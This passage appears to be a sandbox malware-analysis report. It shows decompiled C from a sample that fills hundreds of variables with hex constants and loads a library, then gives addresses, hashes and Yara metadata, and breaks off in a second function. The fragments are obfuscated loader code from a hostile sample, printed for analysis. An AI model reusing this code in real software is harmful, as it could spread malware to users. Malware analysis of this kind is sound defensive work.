				_v1900 = 0x19d0c8f1;
				_v1896 = 0x57673daf;
				_v1892 = 0xf2a532af;
				_v1888 = 0x240475f7;
				_v1884 = 0x46cfe7f3;
				_v1880 = 0xad58dce4;
				_v1876 = 0x18207d91;
				_v1872 = 0x3c1b0996;
				_v1868 = 0x813bb415;
				_v1864 = 0xf0ad736b;
				_v1860 = 0x9a67c68b;
				_v1856 = 0xf3b4eed5;
				_v1852 = 0x69844a1f;
				_v1848 = 0xea145883;
				_v1844 = 0x822acb0b;
				_v1840 = 0x13884116;
				_v1836 = 0xe76b15dc;
				_v1832 = 0x26b2f835;
				_v1828 = 0x58c0b0a6;
				_v1824 = 0x4f99480f;
				_v1820 = 0x8317945d;
				_v1816 = 0x11186d36;
				_v1812 = 0xa36486f9;
				_v1808 = 0x592784c3;
				_v1804 = 0xb01fe73f;
				_v1800 = 0xee7691d5;
				_v1796 = 0x3ca59d41;
				_v1792 = 0x1ffeb2f4;
				_v1788 = 0xe8c4b804;
				_v1784 = 0x6a6fa9f2;
				_v1780 = 0x52f14fe3;
				_v1776 = 0xee467e7e;
				_v1772 = 0x1f34eb8;
				_v1768 = 0xb5b476c8;
				_v1764 = 0x658faff9;
				_v1760 = 0x2dad05f2;
				_v1756 = 0x9aad0b6e;
				_v1752 = 0xe77b8f07;
				_v1748 = 0x888beb88;
				_v1744 = 0xc35503bc;
				_v1740 = 0x4e8b0f48;
				_v1736 = 0xce740bb1;
				_v1732 = 0xc39d368e;
				_v1728 = 0x1b88bdf7;
				_v1724 = 0x23e57627;
				_v1720 = 0xb4788768;
				_v1716 = 0xf19eaf6c;
				_v1712 = 0xdbe1454f;
				_v1708 = 0xc871bcfc;
				_v1704 = 0x127e5dbe;
				_v1700 = 0xfe3e9d14;
				_v1696 = 0x22f72f43;
				_v1692 = 0x4312baa6;
				_v1688 = 0xad4a5ecb;
				_v1684 = 0xa028fea5;
				_v1680 = 0x761b3243;
				_v1676 = 0x34966a1c;
				_v1672 = 0xf6973c49;
				_v1668 = 0x8a40440c;
				_v1664 = 0xee39029a;
				_v1660 = 0x7c1e4236;
				_v1656 = 0x143df846;
				_v1652 = 0x9de53ad0;
				_v1648 = 0xc8beea01;
				_v1644 = 0x29cc1c2d;
				_v1640 = 0x7f4431a8;
				_v1636 = 0xfec5cc0;
				_v1632 = 0x6ee37ac8;
				_v1628 = 0xacbebd8b;
				_v1624 = 0xbb86f15c;
				_v1620 = 0xb7b48568;
				_v1616 = 0x29e47454;
				_v1612 = 0xf3a9637c;
				_v1608 = 0x8f079d8a;
				_v1604 = 0xd6149023;
				_v1600 = 0x907d15f8;
				_v1596 = 0xeab026f;
				_v1592 = 0x9e6a4e4b;
				_v1588 = 0x4a44c5d3;
				_v1584 = 0xd22928bb;
				_v1580 = 0xb1fd329a;
				_v1576 = 0x1c1576c0;
				_v1572 = 0xa4a73685;
				_v1568 = 0x36cd5ba3;
				_v1564 = 0x1a36c10b;
				_v1560 = 0xb0c67415;
				_v1556 = 0x4aaaa7c8;
				_v1552 = 0xcd5df8dd;
				_v1548 = 0x510f2661;
				_v1544 = 0x356fdb71;
				_v1540 = 0x42269525;
				_v1536 = 0x86b8d3a8;
				_v1532 = 0xb6e8fd01;
				_v1528 = 0x3e8b6d07;
				_v1524 = 0x72fbbb5d;
				_v1520 = 0xe78325fb;
				_v1516 = 0xad00bbae;
				_v1512 = 0x81d6f54d;
				_v1508 = 0xc51298d;
				_v1504 = 0x694576a;
				_v1500 = 0x7b073001;
				_v1496 = 0xac7097a8;
				_v1492 = 0x9ae8794d;
				_v1488 = 0xdcb3999d;
				_v1484 = 0x39910103;
				_v1480 = 0x272c8a0d;
				_v1476 = 0xd994c963;
				_v1472 = 0xb8caa410;
				_v1468 = 0x77ea86db;
				_v1464 = 0x4f48a441;
				_v1460 = 0xedf95ffe;
				_v1456 = 0xe35319f5;
				_v1452 = 0x8e7481a9;
				_v1448 = 0xc0fdafea;
				_v1444 = 0xf2265a47;
				_v1440 = 0xcf7bb0c5;
				_v1436 = 0xf2c353b8;
				_v1432 = 0xafbe8713;
				_v1428 = 0xa9402955;
				_v1424 = 0xae9ed42e;
				_v1420 = 0xba8bce00;
				_v1416 = 0x2b54a3db;
				_v1412 = 0xccf05ebe;
				_v1408 = 0xa076ed6b;
				_v1404 = 0xcf4d37ba;
				_v1400 = 0xd04ca788;
				_v1396 = 0x9a366f18;
				_v1392 = 0xfc43d964;
				_v1388 = 0x740c132a;
				_v1384 = 0x7af9ab75;
				_v1380 = 0xfe58605f;
				_v1376 = 0x45284ada;
				_v1372 = 0xdd33943a;
				_v1368 = 0x9603722e;
				_v1364 = 0x5e202100;
				_v1360 = 0x211ec50a;
				_v1356 = 0x5e71f48b;
				_v1352 = 0x4556bd52;
				_v1348 = 0xd305c05b;
				_v1344 = 0xe1d91e4;
				_v1340 = 0x83541fc2;
				_v1336 = 0xcd16994e;
				_v1332 = 0x21346b36;
				_v1328 = 0x1d77397;
				_v1324 = 0x8f9dc5c5;
				_v1320 = 0x94434bc3;
				_v1316 = 0xf3ce98cc;
				_v1312 = 0x5c4aa2fe;
				_v1308 = 0xe951eeea;
				_v1304 = 0xfd5d5f15;
				_v1300 = 0x3cd5a5e6;
				_v1296 = 0x61448c10;
				_v1292 = 0x86fb9609;
				_v1288 = 0xff5281d4;
				_v1284 = 0xb85560b1;
				_v1280 = 0x4e769b9e;
				_v1276 = 0x9c9e9d9a;
				_v1272 = 0x5b283c55;
				_v1268 = 0xc8b47d7a;
				_v1264 = 0x5a493c87;
				_v1260 = 0xfad664f9;
				_v1256 = 0x5abc71e;
				_v1252 = 0x209be785;
				_v1248 = 0x98eee0b9;
				_v1244 = 0xf45c44cb;
				_v1240 = 0xfc890003;
				_v1236 = 0xdde376df;
				_v1232 = 0x99b519eb;
				_v1228 = 0x2f9820c6;
				_v1224 = 0xbfd2c76a;
				_v1220 = 0x368331be;
				_v1216 = 0x34cb7262;
				_v1212 = 0x9e286886;
				_v1208 = 0xf8033aee;
				_v1204 = 0xa641fe10;
				_v1200 = 0xb35d5dc1;
				_v1196 = 0x4168b366;
				_v1192 = 0x879c2bd9;
				_v1188 = 0x384ba925;
				_v1184 = 0xc19e2084;
				_v1180 = 0xc64af4d;
				_v1176 = 0x7edca4f4;
				_v1172 = 0x9d0c78e7;
				_v1168 = 0xa0a5e6d;
				_v1164 = 0x10af2866;
				_v1160 = 0x9ecf2009;
				_v1156 = 0x72e04854;
				_v1152 = 0x2d3f4b90;
				_v1148 = 0x6090f65;
				_v1144 = 0xfa1a3e58;
				_v1140 = 0xc7a398be;
				_v1136 = 0x7246d83c;
				_v1132 = 0x567337f;
				_v1128 = 0x39b2583b;
				_v1124 = 0xc72a706f;
				_v1120 = 0x6f73f905;
				_v1116 = 0xad40a50d;
				_v1112 = 0x600b404a;
				_v1108 = 0x46bbfc74;
				_v1104 = 0x1d99e1d9;
				_v1100 = 0xf52f3d4f;
				_v1096 = 0xf3a9291a;
				_v1092 = 0xd83e3d46;
				_v1088 = 0x1bf9c7de;
				_v1084 = 0xec5f8222;
				_v1080 = 0xa64ad53d;
				_v1076 = 0x1b00aac3;
				_v1072 = 0x5cc80cd4;
				_v1068 = 0x23d0ae6a;
				_v1064 = 0x9f8356c1;
				_v1060 = 0x2cc01cd2;
				_v1056 = 0x6b49265;
				_v1052 = 0x88a81c59;
				_v1048 = 0x36abd356;
				_v1044 = 0xa16f51f3;
				_v1040 = 0x48f7e779;
				_v1036 = 0xd7e3e6d5;
				_v1032 = 0x328ad21a;
				_v1028 = 0xe1bae1bc;
				_v1024 = 0x8857e101;
				_v1020 = 0x876ae51f;
				_v1016 = 0x87756620;
				_v1012 = 0x8eef0fa6;
				_v1008 = 0x184ae7f0;
				_v1004 = 0xbf30c42d;
				_v1000 = 0x40f47861;
				_v996 = 0x3a38bcad;
				_v992 = 0x1943786e;
				_v988 = 0xbb65064b;
				_v984 = 0x397aa2c3;
				_v980 = 0xc866c4b9;
				_v976 = 0xf9379a4e;
				_v972 = 0xfef938c3;
				_v968 = 0x31bef2e7;
				_v964 = 0x38dc8fa2;
				_v960 = 0x17200b94;
				_v956 = 0xf3234397;
				_v952 = 0xce6a264e;
				_v948 = 0xed9f43ef;
				_v944 = 0x396ff646;
				_v940 = 0xfc401490;
				_v936 = 0xe8cf621c;
				_v932 = 0x9703fa40;
				_v928 = 0xad75de4e;
				_v924 = 0x4ccf3491;
				_v920 = 0xbd007eb2;
				_v916 = 0xe40c23c1;
				_v912 = 0x801c9ffb;
				_v908 = 0x44b47ea6;
				_v904 = 0xe4e16921;
				_v900 = 0x3019b644;
				_v896 = 0x4211747d;
				_v892 = 0xc5c07612;
				_v888 = 0xe0c8cd28;
				_v884 = 0xdb7a8454;
				_v880 = 0xeddd87d7;
				_v876 = 0x84e2a523;
				_v872 = 0xb1a72cee;
				_v868 = 0x35fd5e1e;
				_v864 = 0x77c1300;
				_v860 = 0x44e19c63;
				_v856 = 0xcd26a443;
				_v852 = 0x6a20bf6d;
				_v848 = 0x95cb5336;
				_v844 = 0xbb9f097e;
				_v840 = 0x16874c91;
				_v836 = 0xf504549c;
				_v832 = 0x393d32e8;
				_v828 = 0x31216bbc;
				_v824 = 0x21260832;
				_v820 = 0x66ce8284;
				_v816 = 0x3d06524e;
				_v812 = 0x849b5286;
				_v808 = 0xb423b433;
				_v804 = 0x82362b32;
				_v800 = 0xa5e21bc7;
				_v796 = 0xa42133c9;
				_v792 = 0xeb7b9cac;
				_v788 = 0xe6375659;
				_v784 = 0x1035672d;
				_v780 = 0xf3745f93;
				_v776 = 0xb4435473;
				_v772 = 0x1c869446;
				_v768 = 0x62fa226;
				_v764 = 0x9d47888e;
				_v760 = 0x7cb63c6d;
				_v756 = 0x22bdfa65;
				_v752 = 0x93d8172c;
				_v748 = 0x133b2f6b;
				_v744 = 0xd91484c1;
				_v740 = 0x39138faf;
				_v736 = 0x820ffbcf;
				_v732 = 0xb0fcdc78;
				_v728 = 0x137ac19e;
				_v724 = 0xe6036613;
				_v720 = 0x1a089bd1;
				_v716 = 0x26b8ba50;
				_v712 = 0x869fa0d6;
				_v708 = 0xbc873eec;
				_v704 = 0xc87e3136;
				_v700 = 0x4511ee89;
				_v696 = 0xa7415ad9;
				_v692 = 0x7d3bd1d;
				_v688 = 0xb0eb0c53;
				_v684 = 0xd7a6619e;
				_v680 = 0x78bfa5e6;
				_v676 = 0x4089e27b;
				_v672 = 0xa1bc213c;
				_v668 = 0x16673548;
				_v664 = 0x8173ea10;
				_v660 = 0xd6d298a6;
				_v656 = 0x5ccde102;
				_v652 = 0xc73114dc;
				_v648 = 0x4f274da2;
				_v644 = 0x43a9f7a3;
				_v640 = 0xa5bd1e32;
				_v636 = 0xa6c08dc1;
				_v632 = 0x5d59af79;
				_v628 = 0xb79d6c3d;
				_v624 = 0x7b95f209;
				_v620 = 0x339d4f03;
				_v616 = 0xe55c9dda;
				_v612 = 0x1d4e12d0;
				_v608 = 0x14fb9e12;
				_v604 = 0xc04af32b;
				_v600 = 0x5398148c;
				_v596 = 0xc1b8b7e0;
				_v592 = 0x5a046973;
				_v588 = 0x8aab4584;
				_v584 = 0xa316cf3;
				_v580 = 0x8392c969;
				_v576 = 0x66d37a42;
				_v572 = 0xa39a43d0;
				_v568 = 0x72e43df5;
				_v564 = 0x7def3a5b;
				_v560 = 0xa3e032db;
				_v556 = 0xbaae509a;
				_v552 = 0x725465ba;
				_v548 = 0x180c7d81;
				_v544 = 0x811b17e0;
				_v540 = 0x74704b5e;
				_v536 = 0x22f47ff4;
				_v532 = 0xcc6df209;
				_v528 = 0x38770f86;
				_v524 = 0x4016937a;
				_v520 = 0x62212e95;
				_v516 = 0x3aecdd;
				_v512 = 0x9a86b823;
				_v508 = 0xe493bd28;
				_v504 = 0x94dafcea;
				_v500 = 0x6e43dbbe;
				_v496 = 0x11a6291f;
				_v492 = 0x68d91615;
				_v488 = 0x4076d820;
				_v484 = 0xa757a1c7;
				_v480 = 0xadc5eff9;
				_v476 = 0x1d06787c;
				_v472 = 0x48121116;
				_v468 = 0xb8042b02;
				_v464 = 0xa2423491;
				_v460 = 0xd20d9bf7;
				_v456 = 0x33d51d03;
				_v452 = 0x632db46e;
				_v448 = 0x8fce7afe;
				_v444 = 0x88271008;
				_v440 = 0xefddbe88;
				_v436 = 0x24ae9a32;
				_v432 = 0x7bf42295;
				_v428 = 0x268ba065;
				_v424 = 0x124f44dd;
				_v420 = 0xba93dab;
				_v416 = 0xe06e84b0;
				_v412 = 0x8d9ef9eb;
				_v408 = 0xa4caef6b;
				_v404 = 0xb8f2d0d2;
				_v400 = 0x4eef8287;
				_v396 = 0x44d6faca;
				_v392 = 0xb021dd39;
				_v388 = 0x65728ae9;
				_v384 = 0x4ac666ee;
				_v380 = 0xe2d55fa6;
				_v376 = 0xd488f647;
				_v372 = 0x377d26a2;
				_v368 = 0xb1c3322c;
				_v364 = 0xbbb1dfd9;
				_v360 = 0x7ef9d65d;
				_v356 = 0xd69df707;
				_v352 = 0xc8a80235;
				_v348 = 0x7ede6d98;
				_v344 = 0x5a57d2a2;
				_v340 = 0x40af756f;
				_v336 = 0x2944fdef;
				_v332 = 0x3447d376;
				_v328 = 0x7ddf0dbd;
				_v324 = 0x8c688b53;
				_v320 = 0xdede8f54;
				_v316 = 0x1855f41e;
				_v312 = 0xfa3bc857;
				_v308 = 0x1cc619e7;
				_v304 = 0x78f4cf52;
				_v300 = 0x99b717b5;
				_v296 = 0x350e7f98;
				_v292 = 0x6bebc19;
				_v288 = 0x26729ca6;
				_v284 = 0x85259ee2;
				_v280 = 0x4ff5a8b1;
				_v276 = 0x761762f3;
				_v272 = 0xe2377b6c;
				_v268 = 0xf606ea17;
				_v264 = 0x732cd514;
				_v260 = 0x95d9d9f6;
				_v256 = 0x4e1a0c62;
				_v252 = 0x2f571a4a;
				_v248 = 0xde7ffc35;
				_v244 = 0xc1baae08;
				_v240 = 0x330c550e;
				_v236 = 0xe51e9d38;
				_v232 = 0x5c7bafc;
				_v228 = 0xfede311;
				_v224 = 0x7bb4b589;
				_v220 = 0x49de023d;
				_v216 = 0x5746334b;
				_v212 = 0x47c5668e;
				_v208 = 0x20d356d6;
				_v204 = 0x468884d9;
				_v200 = 0xf1a3088;
				_v196 = 0x299cca75;
				_v192 = 0x7e0aef8c;
				_v188 = 0x36e551d0;
				_v184 = 0x48145815;
				_v180 = 0x79d6fd9e;
				_v176 = 0xcb924866;
				_v172 = 0x8efb6fa1;
				_v168 = 0xb926985e;
				_v164 = 0xa196ac7b;
				_v160 = 0xaeab18d4;
				_v156 = 0x78015c1f;
				_v152 = 0x5819869;
				_v148 = 0xcca218d0;
				_v144 = 0x7d06249f;
				_v140 = 0xf0a7edaa;
				_v136 = 0x6a004c;
				_v132 = 0xf9b9513f;
				_v128 = 0x741d919f;
				_v124 = 0x2ea3bc66;
				_v120 = 0xab1dc78a;
				_v116 = 0x74b6dbaa;
				_v112 = 0x7e81bfa1;
				_v108 = 0x4202d69c;
				_v104 = 0x38ce33a7;
				_v100 = 0x595e8000;
				_v96 = 0x290b2103;
				_v92 = 0xe4e40622;
				_v88 = 0xc8dd8e6f;
				_v84 = 0x4979097d;
				_v80 = 0xfee0d431;
				_v76 = 0xb9ce1ec8;
				_v72 = 0x67261b7e;
				_v68 = 0x4ae4b37a;
				_v64 = 0xf9871833;
				_v60 = 0x68a06f47;
				_v56 = 0xd195cac2;
				_v52 = 0x5f95137e;
				_v48 = 0xfcdb6acb;
				_v44 = 0x816238c4;
				_v40 = 0xafd25fa6;
				_v36 = 0xc5ef91f0;
				_v32 = 0x9fbd261a;
				_v28 = 0xfa1b3f6e;
				_v24 = 0x31581501;
				_v20 = 0x54d81d91;
				_v16 = 0xbe2861d0;
				_v12 = 0xb3163952;
				_v8 = 0x10e6581a;
				_t514 = E00401A52(0x4127b0, 0x72fc3a35);
				_t506 = LoadLibraryW(_t505); // executed
				 *0x4164e8 = _t506;
				L00401B09(_t514);
				_push(0x412e80);
				_push(0x2bf385b5);
				return E004012FF( *0x4164e8,  &_v2016, 0x1f7);
			}



























































































































































































































































































































































































































































































































                  0x00406334
                  0x0040633e
                  0x00406348
                  0x00406352
                  0x0040635c
                  0x00406366
                  0x00406370
                  0x0040637a
                  0x00406384
                  0x0040638e
                  0x00406398
                  0x004063a2
                  0x004063ac
                  0x004063b6
                  0x004063c0
                  0x004063ca
                  0x004063d4
                  0x004063de
                  0x004063e8
                  0x004063f2
                  0x004063fc
                  0x00406406
                  0x00406410
                  0x0040641a
                  0x00406424
                  0x0040642e
                  0x00406438
                  0x00406442
                  0x0040644c
                  0x00406456
                  0x00406460
                  0x0040646a
                  0x00406474
                  0x0040647e
                  0x00406488
                  0x00406492
                  0x0040649c
                  0x004064a6
                  0x004064b0
                  0x004064ba
                  0x004064c4
                  0x004064ce
                  0x004064d8
                  0x004064e2
                  0x004064ec
                  0x004064f6
                  0x00406500
                  0x0040650a
                  0x00406514
                  0x0040651e
                  0x00406528
                  0x00406532
                  0x0040653c
                  0x00406546
                  0x00406550
                  0x0040655a
                  0x00406564
                  0x0040656e
                  0x00406578
                  0x00406582
                  0x0040658c
                  0x00406596
                  0x004065a0
                  0x004065aa
                  0x004065b4
                  0x004065be
                  0x004065c8
                  0x004065d2
                  0x004065dc
                  0x004065e6
                  0x004065f0
                  0x004065fa
                  0x00406604
                  0x0040660e
                  0x00406618
                  0x00406622
                  0x0040662c
                  0x00406636
                  0x00406640
                  0x0040664a
                  0x00406654
                  0x0040665e
                  0x00406668
                  0x00406672
                  0x0040667c
                  0x00406686
                  0x00406690
                  0x0040669a
                  0x004066a4
                  0x004066ae
                  0x004066b8
                  0x004066c2
                  0x004066cc
                  0x004066d6
                  0x004066e0
                  0x004066ea
                  0x004066f4
                  0x004066fe
                  0x00406708
                  0x00406712
                  0x0040671c
                  0x00406726
                  0x00406730
                  0x0040673a
                  0x00406744
                  0x0040674e
                  0x00406758
                  0x00406762
                  0x0040676c
                  0x00406776
                  0x00406780
                  0x0040678a
                  0x00406794
                  0x0040679e
                  0x004067a8
                  0x004067b2
                  0x004067bc
                  0x004067c6
                  0x004067d0
                  0x004067da
                  0x004067e4
                  0x004067ee
                  0x004067f8
                  0x00406802
                  0x0040680c
                  0x00406816
                  0x00406820
                  0x0040682a
                  0x00406834
                  0x0040683e
                  0x00406848
                  0x00406852
                  0x0040685c
                  0x00406866
                  0x00406870
                  0x0040687a
                  0x00406884
                  0x0040688e
                  0x00406898
                  0x004068a2
                  0x004068ac
                  0x004068b6
                  0x004068c0
                  0x004068ca
                  0x004068d4
                  0x004068de
                  0x004068e8
                  0x004068f2
                  0x004068fc
                  0x00406906
                  0x00406910
                  0x0040691a
                  0x00406924
                  0x0040692e
                  0x00406938
                  0x00406942
                  0x0040694c
                  0x00406956
                  0x00406960
                  0x0040696a
                  0x00406974
                  0x0040697e
                  0x00406988
                  0x00406992
                  0x0040699c
                  0x004069a6
                  0x004069b0
                  0x004069ba
                  0x004069c4
                  0x004069ce
                  0x004069d8
                  0x004069e2
                  0x004069ec
                  0x004069f6
                  0x00406a00
                  0x00406a0a
                  0x00406a14
                  0x00406a1e
                  0x00406a28
                  0x00406a32
                  0x00406a3c
                  0x00406a46
                  0x00406a50
                  0x00406a5a
                  0x00406a64
                  0x00406a6e
                  0x00406a78
                  0x00406a82
                  0x00406a8c
                  0x00406a96
                  0x00406aa0
                  0x00406aaa
                  0x00406ab4
                  0x00406abe
                  0x00406ac8
                  0x00406ad2
                  0x00406adc
                  0x00406ae6
                  0x00406af0
                  0x00406afa
                  0x00406b04
                  0x00406b0e
                  0x00406b18
                  0x00406b22
                  0x00406b2c
                  0x00406b36
                  0x00406b40
                  0x00406b4a
                  0x00406b54
                  0x00406b5e
                  0x00406b68
                  0x00406b72
                  0x00406b7c
                  0x00406b86
                  0x00406b90
                  0x00406b9a
                  0x00406ba4
                  0x00406bae
                  0x00406bb8
                  0x00406bc2
                  0x00406bcc
                  0x00406bd6
                  0x00406be0
                  0x00406bea
                  0x00406bf4
                  0x00406bfe
                  0x00406c08
                  0x00406c12
                  0x00406c1c
                  0x00406c26
                  0x00406c30
                  0x00406c3a
                  0x00406c44
                  0x00406c4e
                  0x00406c58
                  0x00406c62
                  0x00406c6c
                  0x00406c76
                  0x00406c80
                  0x00406c8a
                  0x00406c94
                  0x00406c9e
                  0x00406ca8
                  0x00406cb2
                  0x00406cbc
                  0x00406cc6
                  0x00406cd0
                  0x00406cda
                  0x00406ce4
                  0x00406cee
                  0x00406cf8
                  0x00406d02
                  0x00406d0c
                  0x00406d16
                  0x00406d20
                  0x00406d2a
                  0x00406d34
                  0x00406d3e
                  0x00406d48
                  0x00406d52
                  0x00406d5c
                  0x00406d66
                  0x00406d70
                  0x00406d7a
                  0x00406d84
                  0x00406d8e
                  0x00406d98
                  0x00406da2
                  0x00406dac
                  0x00406db6
                  0x00406dc0
                  0x00406dca
                  0x00406dd4
                  0x00406dde
                  0x00406de8
                  0x00406df2
                  0x00406dfc
                  0x00406e06
                  0x00406e10
                  0x00406e1a
                  0x00406e24
                  0x00406e2e
                  0x00406e38
                  0x00406e42
                  0x00406e4c
                  0x00406e56
                  0x00406e60
                  0x00406e6a
                  0x00406e74
                  0x00406e7e
                  0x00406e88
                  0x00406e92
                  0x00406e9c
                  0x00406ea6
                  0x00406eb0
                  0x00406eba
                  0x00406ec4
                  0x00406ece
                  0x00406ed8
                  0x00406ee2
                  0x00406eec
                  0x00406ef6
                  0x00406f00
                  0x00406f0a
                  0x00406f14
                  0x00406f1e
                  0x00406f28
                  0x00406f32
                  0x00406f3c
                  0x00406f46
                  0x00406f50
                  0x00406f5a
                  0x00406f64
                  0x00406f6e
                  0x00406f78
                  0x00406f82
                  0x00406f8c
                  0x00406f96
                  0x00406fa0
                  0x00406faa
                  0x00406fb4
                  0x00406fbe
                  0x00406fc8
                  0x00406fd2
                  0x00406fdc
                  0x00406fe6
                  0x00406ff0
                  0x00406ffa
                  0x00407004
                  0x0040700e
                  0x00407018
                  0x00407022
                  0x0040702c
                  0x00407036
                  0x00407040
                  0x0040704a
                  0x00407054
                  0x0040705e
                  0x00407068
                  0x00407072
                  0x0040707c
                  0x00407086
                  0x00407090
                  0x0040709a
                  0x004070a4
                  0x004070ae
                  0x004070b8
                  0x004070c2
                  0x004070cc
                  0x004070d6
                  0x004070e0
                  0x004070ea
                  0x004070f4
                  0x004070fe
                  0x00407108
                  0x00407112
                  0x0040711c
                  0x00407126
                  0x00407130
                  0x0040713a
                  0x00407144
                  0x0040714e
                  0x00407158
                  0x00407162
                  0x0040716c
                  0x00407176
                  0x00407180
                  0x0040718a
                  0x00407194
                  0x0040719e
                  0x004071a8
                  0x004071b2
                  0x004071bc
                  0x004071c6
                  0x004071d0
                  0x004071da
                  0x004071e4
                  0x004071ee
                  0x004071f8
                  0x00407202
                  0x0040720c
                  0x00407216
                  0x00407220
                  0x0040722a
                  0x00407234
                  0x0040723e
                  0x00407248
                  0x00407252
                  0x0040725c
                  0x00407266
                  0x00407270
                  0x0040727a
                  0x00407284
                  0x0040728e
                  0x00407298
                  0x004072a2
                  0x004072ac
                  0x004072b6
                  0x004072c0
                  0x004072ca
                  0x004072d4
                  0x004072de
                  0x004072e8
                  0x004072f2
                  0x004072fc
                  0x00407306
                  0x00407310
                  0x0040731a
                  0x00407324
                  0x0040732e
                  0x00407338
                  0x00407342
                  0x0040734c
                  0x00407356
                  0x00407360
                  0x0040736a
                  0x00407374
                  0x0040737e
                  0x00407388
                  0x00407392
                  0x0040739c
                  0x004073a6
                  0x004073b0
                  0x004073ba
                  0x004073c4
                  0x004073ce
                  0x004073d8
                  0x004073e2
                  0x004073ec
                  0x004073f6
                  0x00407400
                  0x0040740a
                  0x00407414
                  0x0040741e
                  0x00407428
                  0x00407432
                  0x0040743c
                  0x00407446
                  0x00407450
                  0x0040745a
                  0x00407464
                  0x0040746e
                  0x00407478
                  0x00407482
                  0x0040748c
                  0x00407496
                  0x004074a0
                  0x004074aa
                  0x004074b4
                  0x004074be
                  0x004074c8
                  0x004074d2
                  0x004074dc
                  0x004074e6
                  0x004074f0
                  0x004074fa
                  0x00407504
                  0x0040750e
                  0x00407518
                  0x00407522
                  0x0040752c
                  0x00407536
                  0x00407540
                  0x0040754a
                  0x00407554
                  0x0040755e
                  0x00407568
                  0x00407572
                  0x0040757c
                  0x00407586
                  0x00407590
                  0x0040759a
                  0x004075a1
                  0x004075a8
                  0x004075af
                  0x004075b6
                  0x004075bd
                  0x004075c4
                  0x004075cb
                  0x004075d2
                  0x004075d9
                  0x004075e0
                  0x004075e7
                  0x004075ee
                  0x004075f5
                  0x00407601
                  0x0040760d
                  0x00407614
                  0x0040761b
                  0x00407622
                  0x00407629
                  0x00407630
                  0x00407637
                  0x0040763e
                  0x00407645
                  0x0040764c
                  0x00407653
                  0x0040765a
                  0x00407661
                  0x00407668
                  0x0040766f
                  0x00407676
                  0x0040767d
                  0x00407689
                  0x0040768c
                  0x00407694
                  0x00407699
                  0x004076aa
                  0x004076af
                  0x004076c5

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040768C
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: !i$'v#$-OQ3$0sN$6k4!$K3FW$L$THr$Tt)$U<([$YV7$[:}$^Kpt$l{7$m^$}yI$~~F$2=9$Q
                  • API String ID: 1029625771-1009886285
                  • Opcode ID: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction ID: 8b68394b666451bb9afb97b728dfcd24b1eb0b6c41965aaa66b61d789d097ed1
                  • Opcode Fuzzy Hash: e035405825f2c6f0528038317cbdc484b85bd039236133c0542503d7ebbb99e0
                  • Instruction Fuzzy Hash: 6992A5B0C4A7698FDBA18F429E8478DBA75FB41304F5086C8C25D3B215CB761AD2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00408CD5, Relevance: 33.7, APIs: 1, Strings: 18, Instructions: 413libraryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E00408CD5(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
